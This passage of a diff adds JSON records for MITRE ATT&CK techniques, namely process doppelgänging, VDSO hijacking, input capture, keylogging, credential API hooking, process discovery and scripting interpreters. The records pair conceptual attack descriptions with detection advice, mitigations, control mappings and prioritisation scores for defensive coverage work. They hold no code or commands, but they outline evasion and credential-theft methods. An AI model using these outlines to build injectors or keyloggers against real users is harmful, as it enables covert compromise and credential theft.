+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1055.013",
+        "name": "Process Injection: Process Doppelgänging",
+        "description": "Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. \n\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nAdversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nProcess Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):\n\n* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load – Create a shared section of memory and load the malicious executable.\n* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate – Create a process from the tainted section of memory and initiate execution.\n\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. ",
+        "url": "https://attack.mitre.org/techniques/T1055/013",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)\n\nScan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "File: File Metadata",
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1055",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            }
+        ],
+        "cumulative_score": 0.18571428571428572,
+        "adjusted_score": 0.18571428571428572,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "13.2",
+            "13.7"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "SC-18",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1055.014",
+        "name": "Process Injection: VDSO Hijacking",
+        "description": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nVDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.  ",
+        "url": "https://attack.mitre.org/techniques/T1055/014",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+        "platforms": [
+            "Linux"
+        ],
+        "data_sources": [
+            "Module: Module Load",
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1055",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            }
+        ],
+        "cumulative_score": 0.18571428571428572,
+        "adjusted_score": 0.18571428571428572,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "13.2",
+            "13.7"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "SC-18",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1056",
+        "name": "Input Capture",
+        "description": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).",
+        "url": "https://attack.mitre.org/techniques/T1056",
+        "tactics": [
+            "Collection",
+            "Credential Access"
+        ],
+        "detection": "Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.",
+        "platforms": [
+            "Linux",
+            "Network",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Driver: Driver Load",
+            "File: File Modification",
+            "Process: OS API Execution",
+            "Process: Process Creation",
+            "Process: Process Metadata",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1056.001",
+                "name": "Input Capture: Keylogging",
+                "url": "https://attack.mitre.org/techniques/T1056/001",
+                "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ",
+                "detection": "Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.",
+                "mitigations": []
+            },
+            {
+                "tid": "T1056.002",
+                "name": "Input Capture: GUI Input Capture",
+                "url": "https://attack.mitre.org/techniques/T1056/002",
+                "description": "Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems attackers may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) ",
+                "detection": "Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials. For example, command/script history including abnormal parameters (such as requests for credentials and/or strings related to creating password prompts) may be malicious.(Citation: Spoofing credential dialogs) \n\nInspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources. ",
+                "mitigations": [
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
+                    }
+                ]
+            },
+            {
+                "tid": "T1056.003",
+                "name": "Input Capture: Web Portal Capture",
+                "url": "https://attack.mitre.org/techniques/T1056/003",
+                "description": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.\n\nThis variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)",
+                "detection": "File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.",
+                "mitigations": [
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1056.004",
+                "name": "Input Capture: Credential API Hooking",
+                "url": "https://attack.mitre.org/techniques/T1056/004",
+                "description": "Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n",
+                "detection": "Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)\n\nRootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.\n\nVerify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)",
+                "mitigations": []
+            }
+        ],
+        "mitigations": [],
+        "cumulative_score": 0.6221113542857142,
+        "adjusted_score": 0.6221113542857142,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true,
+        "actionability_score": {
+            "combined_score": 0.014285714285714284,
+            "detection_score": 0.03
+        },
+        "choke_point_score": 0.35,
+        "prevalence_score": 0.25782564
+    },
+    {
+        "tid": "T1056.001",
+        "name": "Input Capture: Keylogging",
+        "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ",
+        "url": "https://attack.mitre.org/techniques/T1056/001",
+        "tactics": [
+            "Collection",
+            "Credential Access"
+        ],
+        "detection": "Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.",
+        "platforms": [
+            "Linux",
+            "Network",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Driver: Driver Load",
+            "Process: OS API Execution",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1056",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.10952380952380952,
+        "adjusted_score": 0.10952380952380952,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1056.002",
+        "name": "Input Capture: GUI Input Capture",
+        "description": "Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems attackers may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) ",
+        "url": "https://attack.mitre.org/techniques/T1056/002",
+        "tactics": [
+            "Collection",
+            "Credential Access"
+        ],
+        "detection": "Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials. For example, command/script history including abnormal parameters (such as requests for credentials and/or strings related to creating password prompts) may be malicious.(Citation: Spoofing credential dialogs) \n\nInspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources. ",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "Script: Script Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1056",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.19047619047619047,
+        "adjusted_score": 0.19047619047619047,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "14.1",
+            "14.2",
+            "14.6"
+        ],
+        "nist_controls": [
+            "CA-7",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1056.003",
+        "name": "Input Capture: Web Portal Capture",
+        "description": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.\n\nThis variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)",
+        "url": "https://attack.mitre.org/techniques/T1056/003",
+        "tactics": [
+            "Collection",
+            "Credential Access"
+        ],
+        "detection": "File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1056",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.23333333333333334,
+        "adjusted_score": 0.23333333333333334,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "12.2"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "IA-2"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1056.004",
+        "name": "Input Capture: Credential API Hooking",
+        "description": "Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n",
+        "url": "https://attack.mitre.org/techniques/T1056/004",
+        "tactics": [
+            "Collection",
+            "Credential Access"
+        ],
+        "detection": "Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)\n\nRootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.\n\nVerify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Process: OS API Execution",
+            "Process: Process Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1056",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.1,
+        "adjusted_score": 0.1,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1057",
+        "name": "Process Discovery",
+        "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.",
+        "url": "https://attack.mitre.org/techniques/T1057",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.2606304028571429,
+        "adjusted_score": 0.2606304028571429,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.04285714285714285,
+            "detection_score": 0.09
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.11777326
+    },
+    {
+        "tid": "T1059",
+        "name": "Command and Scripting Interpreter",
+        "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nThere are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)",
+        "url": "https://attack.mitre.org/techniques/T1059",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.\n\nIf scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
+        "platforms": [
+            "Linux",
+            "Network",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Script: Script Execution"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1059.001",
+                "name": "Command and Scripting Interpreter: PowerShell",
+                "url": "https://attack.mitre.org/techniques/T1059/001",
+                "description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)",
